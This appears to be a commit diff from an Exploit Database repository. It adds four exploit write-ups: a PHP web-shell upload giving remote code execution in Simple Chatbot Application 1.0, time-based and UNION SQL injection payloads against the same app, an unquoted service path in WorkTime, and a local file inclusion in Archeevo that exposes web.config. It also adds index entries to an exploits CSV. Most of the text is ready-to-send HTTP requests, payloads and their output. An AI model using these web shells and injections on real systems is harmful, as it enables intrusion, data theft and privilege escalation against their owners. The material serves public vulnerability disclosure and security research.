/core/assets/
/core/backup/
/core/crontab/
/core/font/
/core/fonts/
/core/license/
/core/load/
/core/logout/
/core/password/
/php/audit/
/php/phpinfo.php
/php/temp/
/php/templates/
/php/test/
/php/weather/
/plugins/alarms/
/tools/phpmyadmin/index.php
/tools/migrate.php

111
exploits/php/webapps/50672.txt Normal file
View file

@ -0,0 +1,111 @@
# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE)
# Date: 18/01/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Exploit :
You can upload a php shell file as a bot_avatar or user_avatar or image
# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------
# Request sent as base user
POST /classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost.SA
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474
Content-Length: 1121
Connection: close
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="name"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="short_name"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="intro"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="no_result"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="img"; filename=""
Content-Type: image/jpeg
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php"
Content-Type: application/octet-stream
<?php
if($_REQUEST['s']) {
system($_REQUEST['s']);
} else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="user_avatar"; filename=""
Content-Type: application/octet-stream
-----------------------------55217074722533208072616276474--
# Response
HTTP/1.1 200 OK
Date: Tue, 18 Jan 2022 00:51:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 119
Connection: close
Content-Type: text/html; charset=UTF-8
1
# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------
GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1
Host: localhost.SA
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Tue, 18 Jan 2022 00:51:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>0xSaudi
</pre>

37
exploits/php/webapps/50673.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi
# Date: 18/01/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Steps
# Go to : http://127.0.0.1/classes/Master.php?f=get_response
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt
======
POST /classes/Master.php?f=get_response HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 73
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
======
#Payloads
#Payload (UNION query)
message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -
#(AND/OR time-based blind)
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud

55
exploits/windows/local/50664.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: WorkTime 10.20 Build 4967 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.worktime.com/
# Software Link: https://www.worktime.com/download/worktime_corporate.exe
# Tested Version: 10.20 Build Build 4967
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
WorkTime Server srvWorkTimeServer
C:\WorkTime\WorkTimeServerService.exe
Auto
WorkTime Reports Scheduler WorkTimeReportsScheduler
C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe
Auto
WorkTime Client Watcher Service WTCWatch
C:\Program Files\wtc\WTCWatch.exe WTCWatch
Auto
C:\Users\psycho>sc qc WorkTimeReportsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WorkTimeReportsScheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo
rtsScheduler.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkTime Reports Scheduler
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\psycho>sc qc WTCWatch
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WTCWatch
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\wtc\WTCWatch.exe WTCWatch
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkTime Client Watcher Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

27
exploits/windows/remote/50665.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Archeevo 5.0 - Local File Inclusion
# Google Dork: intitle:"archeevo"
# Date: 01/15/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.keep.pt/
# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
# Version: < 5.0
# Tested on: windows
# 1. Description
Unauthenticated user can exploit LFI vulnerability in file parameter.
# 2. Proof of Concept (PoC)
Access a page that dont exist like /test.aspx and then you will be redirected to
https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
/web.config file of the application.
https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
# 3. Research:
https://miguelsantareno.github.io/MoD_1.pdf

12
files_exploits.csv
View file

@ -11432,6 +11432,7 @@ id,file,description,date,author,type,platform,port
50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows,
50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows,
50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18597,6 +18598,7 @@ id,file,description,date,author,type,platform,port
50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware,
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python,
50652,exploits/windows/remote/50652.txt,"CoreFTP Server build 725 - Directory Traversal (Authenticated)",1970-01-01,LiamInfosec,remote,windows,
50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44743,3 +44745,13 @@ id,file,description,date,author,type,platform,port
50661,exploits/php/webapps/50661.txt,"Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,Himash,webapps,php,
50662,exploits/php/webapps/50662.txt,"Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)",1970-01-01,Himash,webapps,php,
50663,exploits/php/webapps/50663.txt,"WordPress Core 5.8.2 - 'WP_Query' SQL Injection",1970-01-01,"Aryan Chehreghani",webapps,php,
50666,exploits/php/webapps/50666.txt,"Online Resort Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Gaurav Grover",webapps,php,
50667,exploits/php/webapps/50667.txt,"OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,php,
50668,exploits/php/webapps/50668.txt,"OpenBMCS 2.4 - SQLi (Authenticated)",1970-01-01,LiquidWorm,webapps,php,
50669,exploits/php/webapps/50669.txt,"OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,php,
50670,exploits/php/webapps/50670.txt,"OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)",1970-01-01,LiquidWorm,webapps,php,
50671,exploits/php/webapps/50671.txt,"OpenBMCS 2.4 - Information Disclosure",1970-01-01,LiquidWorm,webapps,php,
50672,exploits/php/webapps/50672.txt,"Simple Chatbot Application 1.0 - Remote Code Execution (RCE)",1970-01-01,"Saud Alenazi",webapps,php,
50673,exploits/php/webapps/50673.txt,"Simple Chatbot Application 1.0 - 'message' Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php,
50674,exploits/aspx/webapps/50674.txt,"Nyron 1.0 - SQLi (Unauthenticated)",1970-01-01,"Miguel Santareno",webapps,aspx,
50675,exploits/hardware/webapps/50675.txt,"Creston Web Interface 1.0.0.2159 - Credential Disclosure",1970-01-01,"RedTeam Pentesting GmbH",webapps,hardware,

Can't render this file because it is too large.